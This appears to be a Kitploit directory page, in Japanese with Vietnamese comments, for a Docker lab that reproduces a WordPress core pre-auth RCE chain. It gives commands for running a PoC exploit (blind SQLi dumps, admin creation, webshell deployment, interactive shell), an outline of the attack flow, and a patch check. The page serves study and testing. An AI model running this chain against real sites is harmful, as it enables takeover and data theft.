Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-60137-and-CVE-2026-63030 — DockerベースのWordPressラボで、CVE-2026-60137およびCVE-2026-63030の認証前RCEを再現し、SQLi、権限昇格、ウェブシェル展開のためのPython PoCエクスプロイトを備えています。 | Kitploit
ツール/GitHubGitHub/ivanesk315/cve-2026-60137-and-cve-2026-63030
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育ペイロード開発ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubivanesk315/cve-2026-60137-and-cve-2026-63030

CVE-2026-60137-and-CVE-2026-63030

DockerベースのWordPressラボで、CVE-2026-60137およびCVE-2026-63030の認証前RCEを再現し、SQLi、権限昇格、ウェブシェル展開のためのPython PoCエクスプロイトを備えています。

リポジトリを見る
18時間32分前未レビュー

wp2shell Lab — CVE-2026-60137 & CVE-2026-63030

WordPress Core Pre-Auth RCE ラボ — 実際のエクスプロイト、RCE サーバー。

警告: ラボは脆弱な WordPress を実行します。インターネットに公開しないでください。

構成

root@kitploit:~
.
├── docker-compose.yml     # Lab: WordPress 6.9.4 + MariaDB 11 + phpMyAdmin
├── exploit/               # PoC exploit (clone từ GitHub)
│   └── wp2shell.py        # Full RCE exploit
├── REPORT.md              # Báo cáo phân tích root cause
└── README.md

セットアップ

1. ラボの起動

root@kitploit:~
docker compose up -d

ログに LAB READY が表示されるまで待機します:

root@kitploit:~
docker compose logs -f wpcli

2. PoC エクスプロイトのクローン

root@kitploit:~
git clone https://github.com/0xsha/wp2shell.git exploit

このエクスプロイトは:

  • Python 3.7+、pip install は不要(stdlib のみ使用)
  • パスワードクラックなしで新しい管理者アカウントを作成
  • ウェブシェルを自動デプロイ
  • インタラクティブシェル

3. エクスプロイト

root@kitploit:~
cd exploit

# Check vulnerability (non-destructive)
python wp2shell.py check http://localhost:8080

# Extract data qua blind SQLi
python wp2shell.py read http://localhost:8080 --preset users

# RCE — tạo admin + deploy webshell + chạy command
python wp2shell.py shell http://localhost:8080 --cmd id

# Interactive shell
python wp2shell.py shell http://localhost:8080 -i

サービス

エクスプロイトフローの概要

root@kitploit:~
1. POST /wp-json/batch/v1
   └─ Sub-request[0]: malformed path → parse error
   └─ Sub-request[1]: /wp/v2/posts + author_exclude=<SQLi>
   └─ Sub-request[2]: sacrificial route
   → $matches[] bị lệch index → req[1] nhận handler của req[2]
   → bypass permission_callback → SQLi vào WP_Query

2. SQL Injection (author__not_in)
   → Scalar string bypass is_array() check
   → Raw SQL inject vào WHERE clause

3. Object Hydration → oEmbed Write → Parent Loop Repair
   → Poisoned WP_Post objects persist vào database

4. Changeset Privilege Escalation
   → WordPress switch current_user sang admin

5. Nested REST Request
   → Tạo admin account mới (không cần crack password)

6. Login + Upload webshell plugin → RCE

パッチの検証

root@kitploit:~
# Update WordPress trong container
docker exec -it wp2shell-lab-wp-1 bash -c \
  "curl -sO https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \
   chmod +x wp-cli.phar && \
   ./wp-cli.phar core update --version=6.9.5 --allow-root"

# Re-run exploit — phải fail
python exploit/wp2shell.py check http://localhost:8080

クリーンアップ

root@kitploit:~
docker compose down -v

参考資料

  • 0xsha/wp2shell — GitHub
  • Picus: wp2shell RCE Explained
  • zsec.uk: Code Trace Deep Dive
  • VulnCheck Blog
  • Tenable FAQ
ツールをダウンロード
ServiceURLCredentials
WordPresshttp://localhost:8080admin / Admin!2345
WP Adminhttp://localhost:8080/wp-adminadmin / Admin!2345
phpMyAdminhttp://localhost:8081root / root
REST APIhttp://localhost:8080/wp-json/—
Batch endpointhttp://localhost:8080/wp-json/batch/v1—